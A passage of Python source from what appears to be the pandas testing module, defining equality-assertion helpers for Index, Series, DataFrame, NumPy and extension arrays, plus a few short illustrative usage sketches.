os.environ.clear()
os.environ.update(saved_environ)
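# Usage sketch (hypothetical variable name):
#   with ensure_safe_environment_variables():
#       os.environ["MY_TEMP_FLAG"] = "1"
#       ...  # code under test reads the variable
#   # on exit os.environ is restored to its saved state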
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_index_equal
>>> a = pd.Index([1, 2, 3])
>>> b = pd.Index([1, 2, 3])
>>> assert_index_equal(a, b)
"""
__tracebackhide__ = True
def _check_types(left, right, obj="Index"):
if exact:
assert_class_equal(left, right, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", left, right, obj=obj)
# allow string-like to have different inferred_types
if left.inferred_type in ("string"):
assert right.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", left, right, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
# MultiIndex special comparison for more friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = (
np.sum((left._values != right._values).astype(int)) * 100.0 / len(left)
)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
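# Usage sketch (illustrative only):
#   s1 = Series([1, 2], name="x")
#   s2 = Series([3, 4], name="x")
#   assert_attr_equal("name", s1, s2)   # passes: both names equal "x"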
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
assert_equal(left._right, right._right, obj=f"{obj}.left", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for left_arr, right_arr in zip(left, right):
# count up differences
if not array_equivalent(left_arr, right_arr, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
Examples
--------
>>> from pandas.testing import assert_extension_array_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b, c = a.array, a.array
>>> assert_extension_array_equal(b, c)
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_series_equal
>>> a = pd.Series([1, 2, 3, 4])
>>> b = pd.Series([1, 2, 3, 4])
>>> assert_series_equal(a, b)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype_and_needs_i8_conversion(
left.dtype, right.dtype
) or is_extension_array_dtype_and_needs_i8_conversion(right.dtype, left.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) and needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
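# Illustrative sketch (not part of the original module): assert_equal dispatches on the
# type of ``left``, so one call site covers Series, DataFrame and ndarray comparisons.
# Hypothetical helper, never called.
def _example_assert_equal_dispatch():
    assert_equal(pd.Series([1, 2]), pd.Series([1, 2]))                # -> assert_series_equal
    assert_equal(pd.DataFrame({"a": [1]}), pd.DataFrame({"a": [1]}))  # -> assert_frame_equal
    assert_equal(np.array([1.0, 2.0]), np.array([1.0, 2.0]))          # -> assert_numpy_array_equal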
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
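# Illustrative sketch (not part of the original module): box_expected wraps the same
# expected values in different containers, which keeps parametrized tests concise.
# Hypothetical helper, never called.
def _example_box_expected():
    values = [1, 2, 3]
    idx = box_expected(values, pd.Index)      # Index([1, 2, 3])
    ser = box_expected(values, pd.Series)     # Series([1, 2, 3])
    row = box_expected(values, pd.DataFrame)  # single-row DataFrame (transpose=True by default)
    return idx, ser, row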
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
        # indices are equal; nothing further to check
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
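# Illustrative sketch (not part of the original module): two SparseArrays with the same
# values, fill_value and dtype pass assert_sp_array_equal. Hypothetical helper, never called.
def _example_assert_sp_array_equal():
    left = pd.arrays.SparseArray([0, 0, 1, 2])
    right = pd.arrays.SparseArray([0, 0, 1, 2])
    assert_sp_array_equal(left, right)  # identical sp_values, sp_index, fill_value and dtype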
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
